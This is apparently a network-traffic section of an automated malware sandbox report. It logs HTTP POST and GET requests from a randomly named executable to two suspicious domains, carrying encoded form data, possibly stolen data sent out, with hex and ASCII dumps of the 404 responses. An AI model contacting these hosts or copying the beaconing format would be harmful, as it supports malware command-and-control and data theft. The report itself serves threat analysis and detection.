                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  46192.168.2.449783104.21.35.73805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:43.293009043 CEST759OUTPOST /uhl0/ HTTP/1.1
                  Host: www.jiyitf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.jiyitf.top
                  Referer: http://www.jiyitf.top/uhl0/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 71 65 75 2f 78 58 2f 36 2f 73 56 5a 30 69 4d 4f 42 38 54 68 35 74 67 32 70 45 72 44 33 46 66 71 46 30 4f 68 41 37 5a 72 68 37 6a 7a 6c 71 52 6d 31 4d 6b 44 68 75 36 44 55 6b 75 4d 45 41 62 4f 47 6a 78 52 55 6e 38 78 56 66 52 75 39 35 4f 48 41 72 33 42 77 64 4c 6c 34 58 63 46 52 62 33 4a 4d 38 48 41 47 70 4f 77 5a 72 54 49 4e 52 47 30 57 32 5a 73 66 46 76 56 2b 32 62 54 4e 38 6c 74 47 76 39 50 32 32 68 73 47 57 69 31 5a 6b 74 56 73 77 48 34 49 58 67 38 75 79 5a 73 6e 37 62 6f 58 6c 44 53 41 36 50 4c 4a 4c 39 33 69 34 74 51 70 63 6e 73 70 66 77 34 77 5a 46 74 6c 4c 31 38 51 2f 31 6f 39 43 57 2b 56 53 38 55 58 75 74 51 7a 79 71 66 6c 2b 30 3d
                  Data Ascii: 56gD=qeu/xX/6/sVZ0iMOB8Th5tg2pErD3FfqF0OhA7Zrh7jzlqRm1MkDhu6DUkuMEAbOGjxRUn8xVfRu95OHAr3BwdLl4XcFRb3JM8HAGpOwZrTINRG0W2ZsfFvV+2bTN8ltGv9P22hsGWi1ZktVswH4IXg8uyZsn7boXlDSA6PLJL93i4tQpcnspfw4wZFtlL18Q/1o9CW+VS8UXutQzyqfl+0=
                  Sep 4, 2024 09:38:44.783538103 CEST776INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:44 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BXOkGO188K0%2FdGhR72%2BE06zm0h4ugb%2FDxeDDFKOcLIQmJXLUPxjwAbNl%2FOZQV5q6paIr9ELY8Y5fIWDKrVq6%2BXXLwUESNUBbNpTqs2h8YQajLj8qG7TvPsBoY6nq3OcUZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8bdc525708be424c-EWR
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  47192.168.2.449784104.21.35.73805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:45.843075991 CEST10841OUTPOST /uhl0/ HTTP/1.1
                  Host: www.jiyitf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.jiyitf.top
                  Referer: http://www.jiyitf.top/uhl0/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 71 65 75 2f 78 58 2f 36 2f 73 56 5a 30 69 4d 4f 42 38 54 68 35 74 67 32 70 45 72 44 33 46 66 71 46 30 4f 68 41 37 5a 72 68 37 62 7a 6c 62 78 6d 31 76 63 44 67 75 36 44 56 6b 75 4a 45 41 62 44 47 6a 4a 64 55 6e 78 4b 56 63 35 75 37 72 57 48 46 61 33 42 2b 64 4c 6c 77 33 63 45 63 37 33 6d 4d 38 33 4d 47 70 65 77 5a 72 54 49 4e 54 65 30 52 6b 68 73 54 6c 76 55 33 57 61 63 4a 38 6c 4a 47 76 31 31 32 32 56 47 47 6d 43 31 58 6b 39 56 68 6c 72 34 41 58 67 2b 70 79 5a 43 6e 37 58 33 58 6c 66 34 41 37 37 74 4a 4c 4a 33 6e 70 59 31 32 75 57 32 77 4d 49 30 6e 2b 78 75 72 70 35 73 52 73 41 51 35 33 47 2b 4a 32 77 74 52 35 38 34 6c 33 71 73 30 4b 36 2f 31 50 43 6b 77 54 4a 48 79 48 45 2f 6d 62 44 47 43 32 52 5a 31 75 78 48 6d 50 70 69 2f 36 41 4a 62 6a 46 66 39 74 30 45 53 58 32 67 6d 74 6b 58 75 2f 2b 6f 69 38 47 51 72 6e 2b 39 64 2f 4b 46 78 4c 6e 71 6f 4c 66 55 6c 43 35 4a 66 67 61 78 56 39 35 42 4d 5a 44 54 51 46 62 70 36 66 2b 79 4b 6b 4a 4b 74 62 78 46 6f 50 46 67 79 5a 57 59 46 52 2b 32 36 [TRUNCATED]
                  Data Ascii: 56gD=qeu/xX/6/sVZ0iMOB8Th5tg2pErD3FfqF0OhA7Zrh7bzlbxm1vcDgu6DVkuJEAbDGjJdUnxKVc5u7rWHFa3B+dLlw3cEc73mM83MGpewZrTINTe0RkhsTlvU3WacJ8lJGv1122VGGmC1Xk9Vhlr4AXg+pyZCn7X3Xlf4A77tJLJ3npY12uW2wMI0n+xurp5sRsAQ53G+J2wtR584l3qs0K6/1PCkwTJHyHE/mbDGC2RZ1uxHmPpi/6AJbjFf9t0ESX2gmtkXu/+oi8GQrn+9d/KFxLnqoLfUlC5JfgaxV95BMZDTQFbp6f+yKkJKtbxFoPFgyZWYFR+26mAr1tDmAzbPvtEFJlBFzwaNu6tZ0ZiTfjACUWSfTqbcz60wVt/PK3IUWKbgG63ez01QU0o7Ip7LCZETr3MbiyFq0dxgGUmH8gOotMjyVnbcw6eaNmKkV3svgjUJ4DhDBBdZ3SUcelPAscWEjnqUZhfWTYYzqMeUxbPlg0i6ca5AkeakdfRMDV0NVMKrvsqO+z8bx7QLwXA2V2+OWWpRJyOMyQCXj8kJAcTl1yBG0LhlnRpWaOx1c2Y7g4vCWcBLCV4rwKsOsMvQf7DSdppqwM2ki8tAOp3PaU5EqAeHQFpAf8uLhnOXqP0G/q9k31U6lxWZdIMudPFaldcygSPCokraeEU6qOTNwhdPrwMy8n8mfxXywdvm5QgjYZnkL6tqwGQH/Q1ljOPVlv2sd/n7YFD9dY2XKBNxyVmtUvq/YNEd++bDgZIdcDJ/dSeZuzbfsbx8SesRvt+cbT9Drt4cg+UUrPIY1puEEyqBWHtVwMCTCPfradXjIK91D/T3QhWUfYISX0c+3ria8s2GUsIPM8bOzLhrJqaCAkwU7eVS4fGxfdKbMjjZxbGW1BXfVeIk/XuCNkVGrCL7W3CvwSLMjv3unA8NFuqe3NlAZutjT0uok+xtOzouSwvcBEr2R6I8PH6wGLeSP8HKRtbpt4tzXZsy0OvriOwoJ1S [TRUNCATED]
                  Sep 4, 2024 09:38:47.341674089 CEST782INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:47 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4jkYK070JsTo1ofk9%2BPbAilfG%2F4MbAiGjpG%2B0uCu7IfHNv2mwyh4NSEHAYN%2Bj%2FoItBtq801TM%2B0OaQDgzRpcOt%2BYzhBkI4anoH%2BjbMDLN3NDqIP1A62Ddxh5SNkKnK%2F30Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8bdc5266f8027cf3-EWR
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  48192.168.2.449785104.21.35.73805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:48.388432980 CEST479OUTGET /uhl0/?56gD=ncGfyjKG78FJ3RoiM5vIj9c1hRDw+kHAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI8bXCzTYoePvJD/HBD8ObPaKNbBrKYFELLGg=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.jiyitf.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:38:49.896876097 CEST1130INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:49 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Frgizj9WQtT5Pc2HYVb5PiOilrxpS5VhIzAndHwBKA7mMQLMcC%2B%2BKU%2BgxNHgaWwFbHSqiVPJiAq3WGhwXn1BPBEwVRXSLs1O3ywRAx%2FeVhZEP45pi2DFpFWiHXV5DNCPnw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8bdc5276fa564246-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                  Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  49192.168.2.449786192.185.211.122805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:54.983428001 CEST763OUTPOST /7o3y/ HTTP/1.1
                  Host: www.tadalaturbo.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.tadalaturbo.online
                  Referer: http://www.tadalaturbo.online/7o3y/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 36 36 7a 32 6a 6d 53 53 73 51 72 6f 2f 4c 4a 55 67 6d 59 55 65 35 45 67 4f 61 58 56 39 31 55 41 56 6d 56 38 72 34 6d 6a 31 30 6f 6c 57 73 70 4a 73 32 34 63 44 2f 36 77 6c 62 4d 4f 71 52 58 69 6a 37 52 59 6e 39 6c 74 64 4b 36 56 73 4c 58 55 68 72 6b 49 39 76 72 5a 65 74 65 41 37 53 32 44 68 4a 6b 4e 44 35 63 68 71 79 52 67 45 33 6a 5a 4b 53 77 68 73 62 44 53 6d 6a 41 53 64 46 72 41 6e 37 6a 79 39 76 70 42 50 47 4d 34 2f 30 64 63 4b 75 36 37 36 6d 36 46 57 32 45 75 4e 70 33 66 67 72 6a 71 56 30 55 59 32 39 5a 65 53 72 6c 6a 30 34 54 62 43 79 58 71 72 2b 63 43 66 35 70 42 44 41 3d 3d
                  Data Ascii: 56gD=66z2jmSSsQro/LJUgmYUe5EgOaXV91UAVmV8r4mj10olWspJs24cD/6wlbMOqRXij7RYn9ltdK6VsLXUhrkI9vrZeteA7S2DhJkND5chqyRgE3jZKSwhsbDSmjASdFrAn7jy9vpBPGM4/0dcKu676m6FW2EuNp3fgrjqV0UY29ZeSrlj04TbCyXqr+cCf5pBDA==
                  Sep 4, 2024 09:38:55.450000048 CEST1121INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:55 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                  Accept-Ranges: bytes
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Content-Length: 836
                  Content-Type: text/html
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                  Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  50192.168.2.449787192.185.211.122805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:57.555475950 CEST783OUTPOST /7o3y/ HTTP/1.1
                  Host: www.tadalaturbo.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.tadalaturbo.online
                  Referer: http://www.tadalaturbo.online/7o3y/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 36 36 7a 32 6a 6d 53 53 73 51 72 6f 74 61 5a 55 77 78 4d 55 63 5a 45 6a 41 36 58 56 6b 46 55 45 56 6d 52 38 72 37 72 6d 31 6d 38 6c 56 4a 4e 4a 69 58 34 63 45 2f 36 77 69 72 4d 50 6e 78 58 35 6a 37 63 6e 6e 35 74 74 64 4b 65 56 73 4a 66 55 30 4b 6b 4c 37 2f 72 62 55 39 65 65 34 69 32 44 68 4a 6b 4e 44 35 59 59 71 79 5a 67 45 6b 37 5a 4c 77 59 75 77 4c 44 52 68 6a 41 53 5a 46 72 45 6e 37 6a 55 39 71 77 4a 50 46 6b 34 2f 31 74 63 4e 2f 36 34 76 32 36 50 61 6d 46 45 42 70 54 54 75 65 53 6d 65 79 51 4c 2f 75 42 48 58 74 30 35 6c 4a 79 4d 51 79 7a 5a 32 35 56 32 53 36 55 49 59 46 79 44 59 4d 59 76 47 59 76 74 35 4c 77 2f 62 6b 2b 73 6d 46 34 3d
                  Data Ascii: 56gD=66z2jmSSsQrotaZUwxMUcZEjA6XVkFUEVmR8r7rm1m8lVJNJiX4cE/6wirMPnxX5j7cnn5ttdKeVsJfU0KkL7/rbU9ee4i2DhJkND5YYqyZgEk7ZLwYuwLDRhjASZFrEn7jU9qwJPFk4/1tcN/64v26PamFEBpTTueSmeyQL/uBHXt05lJyMQyzZ25V2S6UIYFyDYMYvGYvt5Lw/bk+smF4=
                  Sep 4, 2024 09:38:58.058960915 CEST1121INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:57 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                  Accept-Ranges: bytes
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Content-Length: 836
                  Content-Type: text/html
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                  Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  51192.168.2.449788192.185.211.122805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:39:00.160928011 CEST10865OUTPOST /7o3y/ HTTP/1.1
                  Host: www.tadalaturbo.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.tadalaturbo.online
                  Referer: http://www.tadalaturbo.online/7o3y/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 36 36 7a 32 6a 6d 53 53 73 51 72 6f 74 61 5a 55 77 78 4d 55 63 5a 45 6a 41 36 58 56 6b 46 55 45 56 6d 52 38 72 37 72 6d 31 6d 6b 6c 57 37 46 4a 74 55 51 63 46 2f 36 77 74 37 4d 43 6e 78 57 68 6a 36 30 6a 6e 35 70 58 64 49 57 56 73 71 48 55 6c 66 45 4c 79 2f 72 62 63 64 65 66 37 53 32 73 68 49 55 33 44 35 49 59 71 79 5a 67 45 69 2f 5a 66 53 77 75 79 4c 44 53 6d 6a 41 65 64 46 72 38 6e 37 37 71 39 71 38 5a 49 30 45 34 34 56 39 63 4d 4a 75 34 79 47 36 42 62 57 46 63 42 70 75 4e 75 66 36 41 65 79 4d 6c 2f 6f 39 48 58 4a 46 5a 67 4a 32 44 4c 68 48 44 74 4b 6c 2b 54 74 45 2b 58 6c 72 36 51 63 55 7a 56 71 6e 65 78 4c 31 61 41 6e 36 54 33 54 59 6a 35 4d 58 35 56 34 35 48 70 74 52 48 32 57 37 4d 5a 49 50 38 58 64 64 31 61 55 4b 4b 31 62 66 7a 39 36 35 65 57 72 4f 6c 43 31 53 4c 54 62 4d 68 4d 54 44 4e 63 73 45 6b 37 37 67 79 55 77 34 62 34 63 6c 6a 46 52 37 4c 2f 76 46 6a 76 68 55 58 44 6c 6a 41 79 39 37 52 36 59 5a 61 4c 62 4e 55 64 2f 38 55 36 2b 48 57 69 44 75 47 72 42 2b 2b 41 34 4c 6f 36 [TRUNCATED]
